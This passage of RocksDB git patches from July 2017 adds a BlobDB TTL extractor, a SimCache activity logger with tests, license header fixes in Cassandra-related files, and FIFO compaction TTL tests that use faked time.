ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + TEST_F(BlobDBTest, StackableDBGet) { Random rnd(301); BlobDBOptionsImpl bdb_options; diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index b56cf205cc2..f4e62fe2d96 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -11,6 +11,7 @@ #include #include +#include #include #include #include @@ -229,6 +230,10 @@ class BlobLogRecord { uint64_t GetBlobSize() const { return blob_size_; } + bool HasTTL() const { + return ttl_val_ != std::numeric_limits::max(); + } + uint32_t GetTTL() const { return ttl_val_; } uint64_t GetTimeVal() const { return time_val_; } diff --git a/utilities/blob_db/ttl_extractor.cc b/utilities/blob_db/ttl_extractor.cc new file mode 100644 index 00000000000..735b2f30fb7 --- /dev/null +++ b/utilities/blob_db/ttl_extractor.cc @@ -0,0 +1,31 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#include "ttl_extractor.h" + +#include "util/coding.h" + +namespace rocksdb { +namespace blob_db { + +bool TTLExtractor::ExtractTTL(const Slice& /*key*/, const Slice& /*value*/, + uint64_t* /*ttl*/, std::string* /*new_value*/, + bool* /*value_changed*/) { + return false; +} + +bool TTLExtractor::ExtractExpiration(const Slice& key, const Slice& value, + uint64_t now, uint64_t* expiration, + std::string* new_value, + bool* value_changed) { + uint64_t ttl; + bool has_ttl = ExtractTTL(key, value, &ttl, new_value, value_changed); + if (has_ttl) { + *expiration = now + ttl; + } + return has_ttl; +} + +} // namespace blob_db +} // namespace rocksdb diff --git a/utilities/blob_db/ttl_extractor.h b/utilities/blob_db/ttl_extractor.h new file mode 100644 index 00000000000..51df944511e --- /dev/null +++ b/utilities/blob_db/ttl_extractor.h @@ -0,0 +1,43 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once + +#include +#include + +#include "rocksdb/slice.h" + +namespace rocksdb { +namespace blob_db { + +// TTLExtractor allow applications to extract TTL from key-value pairs. +// This useful for applications using Put or WriteBatch to write keys and +// don't intend to migrate to PutWithTTL or PutUntil. +// +// Applications can implement either ExtractTTL or ExtractExpiration. If both +// are implemented, ExtractExpiration will take precedence. +class TTLExtractor { + public: + // Extract TTL from key-value pair. + // Return true if the key has TTL, false otherwise. If key has TTL, + // TTL is pass back through ttl. The method can optionally modify the value, + // pass the result back through new_value, and also set value_changed to true. + virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl, + std::string* new_value, bool* value_changed); + + // Extract expiration time from key-value pair. + // Return true if the key has expiration time, false otherwise. If key has + // expiration time, it is pass back through expiration. The method can + // optionally modify the value, pass the result back through new_value, + // and also set value_changed to true. + virtual bool ExtractExpiration(const Slice& key, const Slice& value, + uint64_t now, uint64_t* expiration, + std::string* new_value, bool* value_changed); + + virtual ~TTLExtractor() = default; +}; + +} // namespace blob_db +} // namespace rocksdb From 50a969131f69ffab6f7a694b3b897a7235e899fa Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Fri, 28 Jul 2017 12:18:09 -0700 Subject: [PATCH 057/205] CacheActivityLogger, component to log cache activity into a file Summary: Simple component that will add a new entry in a log file every time we lookup/insert a key in SimCache. API: ``` SimCache::StartActivityLogging(, , ) SimCache::StopActivityLogging() ``` Sending for review, Still need to add more comments. I was thinking about a better approach, but I ended up deciding I will use a mutex to sync the writes to the file, since this feature should not be heavily used and only used to collect info that will be analyzed offline. I think it's okay to hold the mutex every time we lookup/add to the SimCache. Closes https://github.com/facebook/rocksdb/pull/2295 Differential Revision: D5063826 Pulled By: IslamAbdelRahman fbshipit-source-id: f3b5daed8b201987c9a071146ddd5c5740a2dd8c --- CMakeLists.txt | 1 + include/rocksdb/utilities/sim_cache.h | 14 ++ utilities/simulator_cache/sim_cache.cc | 157 ++++++++++++++++++++ utilities/simulator_cache/sim_cache_test.cc | 71 +++++++++ 4 files changed, 243 insertions(+) diff --git a/CMakeLists.txt b/CMakeLists.txt index 2fede71c026..00756e8e3ad 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -727,6 +727,7 @@ set(TESTS utilities/persistent_cache/persistent_cache_test.cc utilities/redis/redis_lists_test.cc utilities/spatialdb/spatial_db_test.cc + utilities/simulator_cache/sim_cache_test.cc utilities/table_properties_collectors/compact_on_deletion_collector_test.cc utilities/transactions/optimistic_transaction_test.cc utilities/transactions/transaction_test.cc diff --git a/include/rocksdb/utilities/sim_cache.h b/include/rocksdb/utilities/sim_cache.h index 60c73ec5d50..f29fd5e8f68 100644 --- a/include/rocksdb/utilities/sim_cache.h +++ b/include/rocksdb/utilities/sim_cache.h @@ -9,6 +9,7 @@ #include #include #include "rocksdb/cache.h" +#include "rocksdb/env.h" #include "rocksdb/slice.h" #include "rocksdb/statistics.h" #include "rocksdb/status.h" @@ -67,6 +68,19 @@ class SimCache : public Cache { // String representation of the statistics of the simcache virtual std::string ToString() const = 0; + // Start storing logs of the cache activity (Add/Lookup) into + // a file located at activity_log_file, max_logging_size option can be used to + // stop logging to the file automatically after reaching a specific size in + // bytes, a values of 0 disable this feature + virtual Status StartActivityLogging(const std::string& activity_log_file, + Env* env, uint64_t max_logging_size = 0) = 0; + + // Stop cache activity logging if any + virtual void StopActivityLogging() = 0; + + // Status of cache logging happening in background + virtual Status GetActivityLoggingStatus() = 0; + private: SimCache(const SimCache&); SimCache& operator=(const SimCache&); diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc index 335ac9896d0..e3d8016579e 100644 --- a/utilities/simulator_cache/sim_cache.cc +++ b/utilities/simulator_cache/sim_cache.cc @@ -7,10 +7,144 @@ #include #include "monitoring/statistics.h" #include "port/port.h" +#include "rocksdb/env.h" +#include "util/file_reader_writer.h" +#include "util/mutexlock.h" +#include "util/string_util.h" namespace rocksdb { namespace { + +class CacheActivityLogger { + public: + CacheActivityLogger() + : activity_logging_enabled_(false), max_logging_size_(0) {} + + ~CacheActivityLogger() { + MutexLock l(&mutex_); + + StopLoggingInternal(); + } + + Status StartLogging(const std::string& activity_log_file, Env* env, + uint64_t max_logging_size = 0) { + assert(activity_log_file != ""); + assert(env != nullptr); + + Status status; + EnvOptions env_opts; + std::unique_ptr log_file; + + MutexLock l(&mutex_); + + // Stop existing logging if any + StopLoggingInternal(); + + // Open log file + status = env->NewWritableFile(activity_log_file, &log_file, env_opts); + if (!status.ok()) { + return status; + } + file_writer_.reset(new WritableFileWriter(std::move(log_file), env_opts)); + + max_logging_size_ = max_logging_size; + activity_logging_enabled_.store(true); + + return status; + } + + void StopLogging() { + MutexLock l(&mutex_); + + StopLoggingInternal(); + } + + void ReportLookup(const Slice& key) { + if (activity_logging_enabled_.load() == false) { + return; + } + + std::string log_line = "LOOKUP - " + key.ToString(true) + "\n"; + + // line format: "LOOKUP - " + MutexLock l(&mutex_); + Status s = file_writer_->Append(log_line); + if (!s.ok() && bg_status_.ok()) { + bg_status_ = s; + } + if (MaxLoggingSizeReached() || !bg_status_.ok()) { + // Stop logging if we have reached the max file size or + // encountered an error + StopLoggingInternal(); + } + } + + void ReportAdd(const Slice& key, size_t size) { + if (activity_logging_enabled_.load() == false) { + return; + } + + std::string log_line = "ADD - "; + log_line += key.ToString(true); + log_line += " - "; + AppendNumberTo(&log_line, size); + log_line += "\n"; + + // line format: "ADD - - " + MutexLock l(&mutex_); + Status s = file_writer_->Append(log_line); + if (!s.ok() && bg_status_.ok()) { + bg_status_ = s; + } + + if (MaxLoggingSizeReached() || !bg_status_.ok()) { + // Stop logging if we have reached the max file size or + // encountered an error + StopLoggingInternal(); + } + } + + Status& bg_status() { + MutexLock l(&mutex_); + return bg_status_; + } + + private: + bool MaxLoggingSizeReached() { + mutex_.AssertHeld(); + + return (max_logging_size_ > 0 && + file_writer_->GetFileSize() >= max_logging_size_); + } + + void StopLoggingInternal() { + mutex_.AssertHeld(); + + if (!activity_logging_enabled_) { + return; + } + + activity_logging_enabled_.store(false); + Status s = file_writer_->Close(); + if (!s.ok() && bg_status_.ok()) { + bg_status_ = s; + } + } + + // Mutex to sync writes to file_writer, and all following + // class data members + port::Mutex mutex_; + // Indicates if logging is currently enabled + // atomic to allow reads without mutex + std::atomic activity_logging_enabled_; + // When reached, we will stop logging and close the file + // Value of 0 means unlimited + uint64_t max_logging_size_; + std::unique_ptr file_writer_; + Status bg_status_; +}; + // SimCacheImpl definition class SimCacheImpl : public SimCache { public: @@ -48,6 +182,9 @@ class SimCacheImpl : public SimCache { } else { key_only_cache_->Release(h); } + + cache_activity_logger_.ReportAdd(key, charge); + return cache_->Insert(key, value, charge, deleter, handle, priority); } @@ -61,6 +198,9 @@ class SimCacheImpl : public SimCache { inc_miss_counter(); RecordTick(stats, SIM_BLOCK_CACHE_MISS); } + + cache_activity_logger_.ReportLookup(key); + return cache_->Lookup(key, stats); } @@ -158,12 +298,29 @@ class SimCacheImpl : public SimCache { return ret; } + virtual Status StartActivityLogging(const std::string& activity_log_file, + Env* env, + uint64_t max_logging_size = 0) override { + return cache_activity_logger_.StartLogging(activity_log_file, env, + max_logging_size); + } + + virtual void StopActivityLogging() override { + cache_activity_logger_.StopLogging(); + } + + virtual Status GetActivityLoggingStatus() override { + return cache_activity_logger_.bg_status(); + } + private: std::shared_ptr cache_; std::shared_ptr key_only_cache_; std::atomic miss_times_; std::atomic hit_times_; Statistics* stats_; + CacheActivityLogger cache_activity_logger_; + void inc_miss_counter() { miss_times_.fetch_add(1, std::memory_order_relaxed); } diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc index 01b328c783e..4c175c94775 100644 --- a/utilities/simulator_cache/sim_cache_test.cc +++ b/utilities/simulator_cache/sim_cache_test.cc @@ -138,6 +138,77 @@ TEST_F(SimCacheTest, SimCache) { ASSERT_EQ(6, simCache->get_hit_counter()); } +TEST_F(SimCacheTest, SimCacheLogging) { + auto table_options = GetTableOptions(); + auto options = GetOptions(table_options); + options.disable_auto_compactions = true; + std::shared_ptr sim_cache = + NewSimCache(NewLRUCache(1024 * 1024), 20000, 0); + table_options.block_cache = sim_cache; + options.table_factory.reset(new BlockBasedTableFactory(table_options)); + Reopen(options); + + int num_block_entries = 20; + for (int i = 0; i < num_block_entries; i++) { + Put(Key(i), "val"); + Flush(); + } + + std::string log_file = test::TmpDir(env_) + "/cache_log.txt"; + ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_)); + for (int i = 0; i < num_block_entries; i++) { + ASSERT_EQ(Get(Key(i)), "val"); + } + for (int i = 0; i < num_block_entries; i++) { + ASSERT_EQ(Get(Key(i)), "val"); + } + sim_cache->StopActivityLogging(); + ASSERT_OK(sim_cache->GetActivityLoggingStatus()); + + std::string file_contents = ""; + ReadFileToString(env_, log_file, &file_contents); + + int lookup_num = 0; + int add_num = 0; + std::string::size_type pos; + + // count number of lookups + pos = 0; + while ((pos = file_contents.find("LOOKUP -", pos)) != std::string::npos) { + ++lookup_num; + pos += 1; + } + + // count number of additions + pos = 0; + while ((pos = file_contents.find("ADD -", pos)) != std::string::npos) { + ++add_num; + pos += 1; + } + + // We asked for every block twice + ASSERT_EQ(lookup_num, num_block_entries * 2); + + // We added every block only once, since the cache can hold all blocks + ASSERT_EQ(add_num, num_block_entries); + + // Log things again but stop logging automatically after reaching 512 bytes + int max_size = 512; + ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_, max_size)); + for (int it = 0; it < 10; it++) { + for (int i = 0; i < num_block_entries; i++) { + ASSERT_EQ(Get(Key(i)), "val"); + } + } + ASSERT_OK(sim_cache->GetActivityLoggingStatus()); + + uint64_t fsize = 0; + ASSERT_OK(env_->GetFileSize(log_file, &fsize)); + // error margin of 100 bytes + ASSERT_LT(fsize, max_size + 100); + ASSERT_GT(fsize, max_size - 100); +} + } // namespace rocksdb int main(int argc, char** argv) { From aace46516bd0b72a05273246d0e97286bad26236 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 28 Jul 2017 13:55:19 -0700 Subject: [PATCH 058/205] Fix license headers in Cassandra related files Summary: I might have missed these while doing some recent cassandra code reviews. Closes https://github.com/facebook/rocksdb/pull/2663 Differential Revision: D5520138 Pulled By: sagar0 fbshipit-source-id: 340930afe9efe03c75f535a1da1f89bd3e53c1f9 --- include/rocksdb/utilities/debug.h | 4 +--- java/rocksjni/cassandra_value_operator.cc | 4 +--- .../java/org/rocksdb/CassandraCompactionFilter.java | 8 ++++---- .../java/org/rocksdb/CassandraValueMergeOperator.java | 4 +--- utilities/cassandra/merge_operator.cc | 4 +--- utilities/cassandra/merge_operator.h | 4 +--- utilities/cassandra/serialize.h | 4 +--- utilities/cassandra/test_utils.cc | 10 ++++------ utilities/cassandra/test_utils.h | 4 +--- 9 files changed, 15 insertions(+), 31 deletions(-) diff --git a/include/rocksdb/utilities/debug.h b/include/rocksdb/utilities/debug.h index f29fa045cba..3e325f69a09 100644 --- a/include/rocksdb/utilities/debug.h +++ b/include/rocksdb/utilities/debug.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #pragma once diff --git a/java/rocksjni/cassandra_value_operator.cc b/java/rocksjni/cassandra_value_operator.cc index 6be6614075a..aa58eccc24a 100644 --- a/java/rocksjni/cassandra_value_operator.cc +++ b/java/rocksjni/cassandra_value_operator.cc @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include #include diff --git a/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java index 05d9aabcf00..26bf3588355 100644 --- a/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java +++ b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java @@ -1,7 +1,7 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java index 55d67a3a375..a09556a2b8d 100644 --- a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java +++ b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. package org.rocksdb; diff --git a/utilities/cassandra/merge_operator.cc b/utilities/cassandra/merge_operator.cc index 75817a78b28..3c9cb7f740b 100644 --- a/utilities/cassandra/merge_operator.cc +++ b/utilities/cassandra/merge_operator.cc @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include "merge_operator.h" diff --git a/utilities/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h index b46662c26d8..edbf120015f 100644 --- a/utilities/cassandra/merge_operator.h +++ b/utilities/cassandra/merge_operator.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #pragma once #include "rocksdb/merge_operator.h" diff --git a/utilities/cassandra/serialize.h b/utilities/cassandra/serialize.h index 0e35d34af00..64ccd4c29f0 100644 --- a/utilities/cassandra/serialize.h +++ b/utilities/cassandra/serialize.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. /** * Helper functions which serialize and deserialize integers diff --git a/utilities/cassandra/test_utils.cc b/utilities/cassandra/test_utils.cc index 68d0381e0e5..61f53b2d375 100644 --- a/utilities/cassandra/test_utils.cc +++ b/utilities/cassandra/test_utils.cc @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "test_utils.h" diff --git a/utilities/cassandra/test_utils.h b/utilities/cassandra/test_utils.h index 7ca6cfd6146..463b12bf283 100644 --- a/utilities/cassandra/test_utils.h +++ b/utilities/cassandra/test_utils.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #pragma once #include From aaf42fe77508735b36a412eb4c183df58e8a54cd Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 28 Jul 2017 14:21:38 -0700 Subject: [PATCH 059/205] Move blob_db/ttl_extractor.h into blob_db/blob_db.h Summary: Move blob_db/ttl_extractor.h into blob_db/blob_db.h Also exclude TTLExtractor from LITE build. Closes https://github.com/facebook/rocksdb/pull/2665 Differential Revision: D5520009 Pulled By: yiwu-arbug fbshipit-source-id: 4813dcc272c7cc4bf2cdac285256d9a17d78c7b7 --- utilities/blob_db/blob_db.h | 30 ++++++++++++++++++++- utilities/blob_db/ttl_extractor.cc | 5 +++- utilities/blob_db/ttl_extractor.h | 43 ------------------------------ 3 files changed, 33 insertions(+), 45 deletions(-) delete mode 100644 utilities/blob_db/ttl_extractor.h diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index dfb21383dda..e68b40a0ac7 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -13,12 +13,13 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/stackable_db.h" -#include "utilities/blob_db/ttl_extractor.h" namespace rocksdb { namespace blob_db { +class TTLExtractor; + // A wrapped database which puts values of KV pairs in a separate log // and store location to the log in the underlying DB. // It lacks lots of importatant functionalities, e.g. DB restarts, @@ -188,6 +189,33 @@ class BlobDB : public StackableDB { Status DestroyBlobDB(const std::string& dbname, const Options& options, const BlobDBOptions& bdb_options); +// TTLExtractor allow applications to extract TTL from key-value pairs. +// This useful for applications using Put or WriteBatch to write keys and +// don't intend to migrate to PutWithTTL or PutUntil. +// +// Applications can implement either ExtractTTL or ExtractExpiration. If both +// are implemented, ExtractExpiration will take precedence. +class TTLExtractor { + public: + // Extract TTL from key-value pair. + // Return true if the key has TTL, false otherwise. If key has TTL, + // TTL is pass back through ttl. The method can optionally modify the value, + // pass the result back through new_value, and also set value_changed to true. + virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl, + std::string* new_value, bool* value_changed); + + // Extract expiration time from key-value pair. + // Return true if the key has expiration time, false otherwise. If key has + // expiration time, it is pass back through expiration. The method can + // optionally modify the value, pass the result back through new_value, + // and also set value_changed to true. + virtual bool ExtractExpiration(const Slice& key, const Slice& value, + uint64_t now, uint64_t* expiration, + std::string* new_value, bool* value_changed); + + virtual ~TTLExtractor() = default; +}; + } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/ttl_extractor.cc b/utilities/blob_db/ttl_extractor.cc index 735b2f30fb7..267f904b675 100644 --- a/utilities/blob_db/ttl_extractor.cc +++ b/utilities/blob_db/ttl_extractor.cc @@ -2,8 +2,9 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -#include "ttl_extractor.h" +#ifndef ROCKSDB_LITE +#include "utilities/blob_db/blob_db.h" #include "util/coding.h" namespace rocksdb { @@ -29,3 +30,5 @@ bool TTLExtractor::ExtractExpiration(const Slice& key, const Slice& value, } // namespace blob_db } // namespace rocksdb + +#endif // ROCKSDB_LITE diff --git a/utilities/blob_db/ttl_extractor.h b/utilities/blob_db/ttl_extractor.h deleted file mode 100644 index 51df944511e..00000000000 --- a/utilities/blob_db/ttl_extractor.h +++ /dev/null @@ -1,43 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). -#pragma once - -#include -#include - -#include "rocksdb/slice.h" - -namespace rocksdb { -namespace blob_db { - -// TTLExtractor allow applications to extract TTL from key-value pairs. -// This useful for applications using Put or WriteBatch to write keys and -// don't intend to migrate to PutWithTTL or PutUntil. -// -// Applications can implement either ExtractTTL or ExtractExpiration. If both -// are implemented, ExtractExpiration will take precedence. -class TTLExtractor { - public: - // Extract TTL from key-value pair. - // Return true if the key has TTL, false otherwise. If key has TTL, - // TTL is pass back through ttl. The method can optionally modify the value, - // pass the result back through new_value, and also set value_changed to true. - virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl, - std::string* new_value, bool* value_changed); - - // Extract expiration time from key-value pair. - // Return true if the key has expiration time, false otherwise. If key has - // expiration time, it is pass back through expiration. The method can - // optionally modify the value, pass the result back through new_value, - // and also set value_changed to true. - virtual bool ExtractExpiration(const Slice& key, const Slice& value, - uint64_t now, uint64_t* expiration, - std::string* new_value, bool* value_changed); - - virtual ~TTLExtractor() = default; -}; - -} // namespace blob_db -} // namespace rocksdb From ac748c57ed72e021cfc7c24b4920737a1973ca97 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 28 Jul 2017 14:28:09 -0700 Subject: [PATCH 060/205] Fix FIFO Compaction with TTL tests Summary: - FIFOCompactionWithTTLTest was flaky when run in parallel earlier, and hence it was disabled. Fixed it now. - Also, faking sleep now instead of really sleeping to make tests more realistic by using TTLs like 1 hour and 1 day. Closes https://github.com/facebook/rocksdb/pull/2650 Differential Revision: D5506038 Pulled By: sagar0 fbshipit-source-id: deb429a527f045e3e2c5138b547c3e8ac8586aa2 --- db/db_test.cc | 60 ++++++++++++++++++++++++++++++--------------------- 1 file changed, 35 insertions(+), 25 deletions(-) diff --git a/db/db_test.cc b/db/db_test.cc index e9840faa042..8d637e579fb 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -2847,20 +2847,23 @@ TEST_F(DBTest, FIFOCompactionWithTTLAndVariousTableFormatsTest) { ASSERT_TRUE(TryReopen(options).IsNotSupported()); } -TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { +TEST_F(DBTest, FIFOCompactionWithTTLTest) { Options options; options.compaction_style = kCompactionStyleFIFO; options.write_buffer_size = 10 << 10; // 10KB options.arena_block_size = 4096; options.compression = kNoCompression; options.create_if_missing = true; + env_->time_elapse_only_sleep_ = false; + options.env = env_; // Test to make sure that all files with expired ttl are deleted on next // manual compaction. { + env_->addon_time_.store(0); options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = false; - options.compaction_options_fifo.ttl = 600; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60 ; // 1 hour options = CurrentOptions(options); DestroyAndReopen(options); @@ -2871,19 +2874,21 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); - // sleep for 5 seconds - env_->SleepForMicroseconds(5 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + // Note: Couldn't use SleepForMicroseconds because it takes an int instead + // of uint64_t. Hence used addon_time_ directly. + // env_->SleepForMicroseconds(2 * 60 * 60 * 1000 * 1000); + env_->addon_time_.fetch_add(2 * 60 * 60); + + // Since no flushes and compactions have run, the db should still be in + // the same state even after considerable time has passed. ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); - // change ttl to 1 sec. So all files should be deleted on next compaction. - options.compaction_options_fifo.ttl = 1; - Reopen(options); - dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr); ASSERT_EQ(NumTableFilesAtLevel(0), 0); } @@ -2893,7 +2898,7 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { { options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = false; - options.compaction_options_fifo.ttl = 5; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options = CurrentOptions(options); DestroyAndReopen(options); @@ -2904,11 +2909,13 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); - env_->SleepForMicroseconds(6 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + env_->addon_time_.fetch_add(2 * 60 * 60); + // Just to make sure that we are in the same state even after sleeping. ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 10); @@ -2930,10 +2937,10 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { // Test that shows the fall back to size-based FIFO compaction if TTL-based // deletion doesn't move the total size to be less than max_table_files_size. { - options.write_buffer_size = 110 << 10; // 10KB + options.write_buffer_size = 10 << 10; // 10KB options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = false; - options.compaction_options_fifo.ttl = 5; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options = CurrentOptions(options); DestroyAndReopen(options); @@ -2944,11 +2951,13 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 3); - env_->SleepForMicroseconds(6 * 1000 * 1000); + // Sleep for 2 hours -- which is much greater than TTL. + env_->addon_time_.fetch_add(2 * 60 * 60); + // Just to make sure that we are in the same state even after sleeping. ASSERT_OK(dbfull()->TEST_WaitForCompact()); ASSERT_EQ(NumTableFilesAtLevel(0), 3); @@ -2957,8 +2966,8 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } - ASSERT_OK(dbfull()->TEST_WaitForCompact()); // Size limit is still guaranteed. ASSERT_LE(SizeAtLevel(0), options.compaction_options_fifo.max_table_files_size); @@ -2968,7 +2977,7 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { { options.compaction_options_fifo.max_table_files_size = 150 << 10; // 150KB options.compaction_options_fifo.allow_compaction = true; - options.compaction_options_fifo.ttl = 5; // seconds + options.compaction_options_fifo.ttl = 1 * 60 * 60; // 1 hour options.level0_file_num_compaction_trigger = 6; options = CurrentOptions(options); DestroyAndReopen(options); @@ -2980,15 +2989,16 @@ TEST_F(DBTest, DISABLED_FIFOCompactionWithTTLTest) { ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980))); } Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); } // With Intra-L0 compaction, out of 10 files, 6 